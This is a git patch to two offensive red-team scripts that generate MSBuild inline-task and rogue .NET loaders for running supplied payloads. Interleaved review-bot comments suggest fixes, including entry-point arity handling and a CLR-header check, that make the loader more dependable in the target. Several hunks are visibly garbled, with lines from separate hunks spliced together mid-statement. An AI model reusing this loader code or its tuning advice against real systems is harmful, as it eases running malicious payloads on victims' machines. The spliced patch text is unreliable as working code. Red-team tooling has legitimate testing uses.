From 01e2fa3643f28dd217420be4dbd852bcdbd1efd8 Mon Sep 17 00:00:00 2001
From: mgeeky
Date: Wed, 20 Jan 2021 09:24:47 -0800
Subject: [PATCH] Updated generateMSBuildXML.py and generateRogueDotNet.py
---
 red-teaming/generateMSBuildXML.py | 44 +++++++++----------
 .../rogue-dot-net/generateRogueDotNet.py | 31 +++++--------
 2 files changed, 32 insertions(+), 43 deletions(-)
diff --git a/red-teaming/generateMSBuildXML.py b/red-teaming/generateMSBuildXML.py
index dce0501..2437e25 100644
--- a/red-teaming/generateMSBuildXML.py
+++ b/red-teaming/generateMSBuildXML.py
@@ -22,6 +22,7 @@ import sys
 import gzip
 import base64
 import string
+import pefile
 import struct
 import random
 import binascii
@@ -83,10 +84,16 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
 ''').safe_substitute(
- payloadCode = payloadCode
+ payloadCode = payloadCode,
+ templateName = templateName
 )
 launchCode = exeLaunchCode
@@ -143,7 +151,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
 using System.Runtime.InteropServices;
 using System.IO;
 using System.IO.Compression;
- using System.Text;
+ using System.Text;
 public class $templateName : Task {
@@ -489,26 +497,12 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
 return template
 def detectFileIsExe(filePath, forced = False):
- first1000 = []
-
- with open(filePath, 'rb') as f:
- first1000 = f.read()[:1000]
-
- if not (first1000[0] == 'M' and first1000[1] == 'Z'):
+ try:
+ pe = pefile.PE(filePath)
+ return True
+ except pefile.PEFormatError as e:
 return False
- elfanew = struct.unpack('\s*\n', '', output)
 output = output.replace('\n', '')
@@ -601,6 +595,10 @@ def main(argv):
 _format = 'powershell'
+ if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
+ sys.stderr.write('[?] Input file does not exists.\n\n')
+ return False
+
 if args.exe:
 if not detectFileIsExe(args.inputFile, args.exe):
 sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
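Review bot: `import pefile` in the @@ -22 hunk pulls a third-party package into a script whose neighbouring imports are all standard library, and the diffstat shows this commit touches only the two scripts, so nothing visible declares the dependency and a user without it gets a bare ModuleNotFoundError at startup. Either record it where the project declares dependencies (a pinned version keeps the tooling's supply chain auditable) or fail clearly at the import site: `try: import pefile` / `except ImportError: sys.exit('[!] pefile is required: pip install pefile')`. The rest of the import block is outside this hunk, so an existing requirements mechanism may exist that I cannot see.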
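Review bot: In the new detectFileIsExe, `pe = pefile.PE(filePath)` opens and fully parses the input (pefile memory-maps the file by default) but the object is never closed, so the mapping lives until garbage collection and keeps the file locked on Windows; a full parse is also more than a yes/no format check needs. Suggest `pe = pefile.PE(filePath, fast_load=True)` followed by `pe.close()` before `return True`, and dropping the unused `as e`. The `forced` parameter is now accepted but never read, while the main() hunk still passes `args.exe` into it; either remove it or add a comment stating it no longer bypasses the check.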
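Review bot: In the main() hunk, `if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):` raises TypeError instead of printing the intended message when `inputFile` is None, which is argparse's default for an omitted option unless the parser (defined outside this hunk) sets one; `if args.inputFile and not os.path.isfile(args.inputFile):` covers both the empty and the missing case. The message should read `'[?] Input file does not exist.\n\n'`. The guard also relies on `os` being imported, which the import hunk above does not add — worth confirming it is imported higher up.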
diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py
index 8644a2f..0d657da 100644
--- a/red-teaming/rogue-dot-net/generateRogueDotNet.py
+++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py
@@ -47,6 +47,7 @@ import string
 import struct
 import random
 import binascii
+import pefile
 import argparse
 import tempfile
 import subprocess
@@ -236,8 +237,8 @@ def getSourceFileContents(
 Assembly asm = Assembly.Load(payload);
 MethodInfo method = asm.EntryPoint;
 object instance = asm.CreateInstance(method.Name);
- method.Invoke(instance, null);
-
+ method.Invoke(instance, new object[] { new string[] { } });
+ return true;
 }
 ''').safe_substitute(
@@ -662,26 +663,12 @@ $namespaceStop
 return template, templateName
 def detectFileIsExe(filePath, forced = False):
- first1000 = []
-
- with open(filePath, 'rb') as f:
- first1000 = f.read()[:1000]
-
- if not (first1000[0] == 'M' and first1000[1] == 'Z'):
+ try:
+ pe = pefile.PE(filePath)
+ return True
+ except pefile.PEFormatError as e:
 return False
- elfanew = struct.unpack(' 0 and not os.path.isfile(args.inputFile):
+ sys.stderr.write('[?] Input file does not exists.\n\n')
+ return False
+
 if args.type not in ['exec', 'run-command']:
 if args.exe:
 if not detectFileIsExe(args.inputFile, args.exe):
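Review bot: `method.Invoke(instance, new object[] { new string[] { } })` in the @@ -236 hunk now always passes exactly one argument, so an assembly whose entry point is a parameterless `static void Main()` throws TargetParameterCountException where the old `null` call succeeded — the change fixes `Main(string[] args)` at the cost of the other common signature. Branch on the entry point's arity instead: `object[] invokeArgs = method.GetParameters().Length == 0 ? null : new object[] { new string[] { } };` followed by `method.Invoke(instance, invokeArgs);`. This C# sits inside a Python template string whose enclosing function, getSourceFileContents, begins before the hunk.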
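Review bot: The rewritten detectFileIsExe accepts any PE that pefile can parse, but if the `--exe` input is what ends up in `Assembly.Load(payload)` in the generated C# (the @@ -236 hunk), a native, non-.NET executable passes this check and only fails at runtime inside the target — presumably the worst place to discover it. If that is the intended contract, checking the parsed object for a CLR runtime header, `pe.OPTIONAL_HEADER.DATA_DIRECTORY[14].VirtualAddress != 0`, would reject it up front; if native PEs are deliberately allowed, a comment saying so would help. Independently, `pe` is never closed and `forced` is no longer read; `pe.close()` before `return True` and removing or documenting the parameter would settle both.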
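Review bot: In the final main() hunk, `len(args.inputFile) > 0` raises TypeError when the option is absent and `inputFile` is None, rather than printing the intended message; `if args.inputFile and not os.path.isfile(args.inputFile):` handles the empty and missing cases alike. The message `'[?] Input file does not exists.\n\n'` should be `'[?] Input file does not exist.\n\n'`. The hunk header and its first context line are garbled in this rendering of the patch, so the exact surrounding lines could not be verified.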